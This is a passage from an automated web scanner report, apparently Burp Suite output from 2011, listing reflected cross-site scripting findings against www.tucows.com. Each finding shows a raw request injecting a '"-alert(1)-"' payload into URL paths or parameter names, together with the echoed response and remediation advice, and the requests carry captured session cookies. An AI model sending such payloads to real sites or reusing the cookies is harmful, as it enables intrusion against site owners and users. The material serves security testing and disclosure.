Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffad2"-alert(1)-"0aea99c7693 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /author_ratings.htmlffad2"-alert(1)-"0aea99c7693 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.241. http://www.tucows.com/author_ratings.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.tucows.com
Path: /author_ratings.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 509d3"-alert(1)-"fb9a5a72368 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /author_ratings.html?509d3"-alert(1)-"fb9a5a72368=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 34722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72c33"-alert(1)-"30d1cfe8a9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /contact.html72c33"-alert(1)-"30d1cfe8a9a HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.243. http://www.tucows.com/contact.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.tucows.com
Path: /contact.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c10ba"-alert(1)-"8abc5e611cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /contact.html?c10ba"-alert(1)-"8abc5e611cd=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Contact Us</title> < ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39d2e"-alert(1)-"560230630e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images39d2e"-alert(1)-"560230630e8/newassets/contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40764"-alert(1)-"3559dd93eff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets40764"-alert(1)-"3559dd93eff/contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:58 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ffcf"-alert(1)-"e9260562356 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/contact.html3ffcf"-alert(1)-"e9260562356 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.247. http://www.tucows.com/images/newassets/contact.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.tucows.com
Path: /images/newassets/contact.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28c0c"-alert(1)-"83c957dbfec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/contact.html?28c0c"-alert(1)-"83c957dbfec=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afe9d"-alert(1)-"8324c4abd1e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imagesafe9d"-alert(1)-"8324c4abd1e/newassets/includes/corpbar/cb3.0/css/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:15 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87e88"-alert(1)-"29fef7fc009 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets87e88"-alert(1)-"29fef7fc009/includes/corpbar/cb3.0/css/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:22 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff73f"-alert(1)-"c3006f1651f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includesff73f"-alert(1)-"c3006f1651f/corpbar/cb3.0/css/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:32 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8e6b"-alert(1)-"3078349caa2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/corpbarb8e6b"-alert(1)-"3078349caa2/cb3.0/css/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:43 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
